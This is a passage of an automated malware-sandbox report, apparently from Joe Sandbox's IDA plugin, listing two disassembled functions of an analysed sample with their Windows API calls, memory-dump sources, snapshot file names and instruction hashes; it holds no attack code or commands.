                                        • Instruction ID: 4d3c26c28163c1d6a5cbfe0588fea94d0d706a9dcba177be2dc11db0d9688ff8
                                        • Opcode Fuzzy Hash: c60e3b8138696d302b5dfcd55e19b357a680c2cc123ca28a4198732b5b9d9274
                                        • Instruction Fuzzy Hash: 0DD0A9313C1300BAF238B330DC0FFC62A01AB84B10F600812B245AA0C0C9E86800C788
                                        Function 00782C81 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00782C8B
                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00782C9E
                                          • Part of subcall function 0075F1A7: Sleep.KERNEL32 ref: 0075F21F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: 9aee13cc3fa746072fc52c9819bc8797f1f34f493a0dac6a10b0f2526d1a5cf4
                                        • Instruction ID: 2ebe4d31bac68b02865f61d0c95e6a484153f43edeab31bdae543d59db5d4922
                                        • Opcode Fuzzy Hash: 9aee13cc3fa746072fc52c9819bc8797f1f34f493a0dac6a10b0f2526d1a5cf4
                                        • Instruction Fuzzy Hash: F9D0A9353C4300B6E238B330DC0FFC62A01AB80B10F200812B249AA0C0C9E86800C788
                                        Function 0072C19D Relevance: 5.1, APIs: 4, Instructions: 139COMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0072C233
                                        • GetLastError.KERNEL32 ref: 0072C241
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0072C29C
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$ErrorLast
                                        • String ID:
                                        • API String ID: 1717984340-0
                                        • Opcode ID: 427e094f8ca5e31ffffb0d4b885f21da9a5bff501f41e16623d7099697fee9d1
                                        • Instruction ID: 5b1a9a0e7289bb8ec243838d4a4ddb2d582d025a4d578bb0b9ec87e006b7da03
                                        • Opcode Fuzzy Hash: 427e094f8ca5e31ffffb0d4b885f21da9a5bff501f41e16623d7099697fee9d1
                                        • Instruction Fuzzy Hash: 0E41D931600226EFDB228FE8E844ABE7BF9FF65320F254169E855A71A1DF388D41C751